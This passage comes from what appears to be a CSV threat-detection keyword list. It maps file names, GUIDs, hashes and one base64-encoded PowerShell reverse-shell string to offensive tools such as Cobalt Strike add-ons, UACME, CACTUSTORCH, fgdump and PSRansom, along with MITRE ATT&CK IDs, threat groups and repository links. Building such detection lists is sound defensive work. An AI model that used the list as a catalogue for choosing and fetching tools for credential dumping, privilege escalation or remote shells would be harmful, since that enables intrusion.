Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*C2script/proxy.*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*'c2server'*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,0,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*C2Server.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*C2Server.ps1*,offensive_tool_keyword,PSRansom,PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.,T1486 - T1107 - T1566.001,TA0011 - TA0010,N/A,N/A,C2,https://github.com/JoelGMSec/PSRansom,1,1,N/A,10,4,371,95,2022-09-29T09:54:34Z,2022-02-27T11:52:03Z -*c2server_arm_musl*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*c2server_armv7*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*c2server_debug*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*c2server_linux*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*c2server_macos*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*c2server_release*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*c2server_windows*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*C2TaskMessage.*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*c2VydmVyMS5jaWEuZ292*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*C2WebSocketHandler.*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*c4d57f02dd8276fb3df81442bda345d4c3004dfc2842b2140ac9e71b30fd743b*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*c51beca480d6e6f88174698503c0856c56488a59101d259c068dccb0902b01ec*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*C526B877-6AFF-413C-BC03-1837FB63BC22*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*c708b83f-4167-4b4c-a1db-d2011ecb3200*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*C73A4893-A5D1-44C8-900C-7B8850BBD2EC*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,0,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*C7E4B529-6372-449A-9184-74E74E432FE8*,offensive_tool_keyword,KrakenMask,A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.,T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/RtlDallas/KrakenMask,1,0,N/A,9,2,144,28,2023-08-08T15:21:28Z,2023-08-05T19:24:36Z -*C8482002-F594-4C28-9C46-960B036540A8*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,0,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*CA280845-1F10-4E65-9DE7-D9C6513BBD91*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,0,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*,offensive_tool_keyword,Shell3er,PowerShell Reverse Shell,T1059.001 - T1021.004 - T1090.002,TA0002 - TA0011,N/A,N/A,shell spawning,https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1,1,0,N/A,N/A,1,56,11,2023-05-07T16:02:41Z,2023-05-07T15:35:16Z -*cache_activedirectory.py*,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*cachedump.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cachedump64.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*CACTUSTORCH*,offensive_tool_keyword,CACTUSTORCH,A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.,T1059 - T1055 - T1218 - T1027,TA0002 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://github.com/mdsecactivebreach/CACTUSTORCH,1,0,N/A,N/A,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.cna*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.cs*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.hta*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.js*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.vba*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.vbe*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.vbs*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*caffix*amass*,offensive_tool_keyword,Amass,The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.,T1590 - T1591 - T1592 - T1593 - T1594 - T1595,TA0009 - TA0011 - TA0007,N/A,N/A,Information Gathering,https://github.com/OWASP/Amass,1,0,N/A,N/A,10,10153,1759,2023-09-19T11:29:11Z,2018-07-10T16:05:08Z -*caffix/amass*,offensive_tool_keyword,Amass,In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping,T1593 - T1594 - T1595 - T1567 - T1569,TA0007 - TA0009 - TA0004 - TA0005 - TA0011,N/A,N/A,Information Gathering,https://github.com/OWASP/Amass,1,0,N/A,N/A,10,10153,1759,2023-09-19T11:29:11Z,2018-07-10T16:05:08Z -*calebstewart/pwncat*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*-CalendarNTLMLeak*,offensive_tool_keyword,POC,CVE-2023-23397 POC Powershell exploit,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/api0cradle/CVE-2023-23397-POC-Powershell,1,1,N/A,N/A,4,340,64,2023-03-17T07:47:40Z,2023-03-16T19:43:39Z -*CALLBACK_HASHDUMP*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*CALLBACK_KEYSTROKES*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*CALLBACK_NETVIEW*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 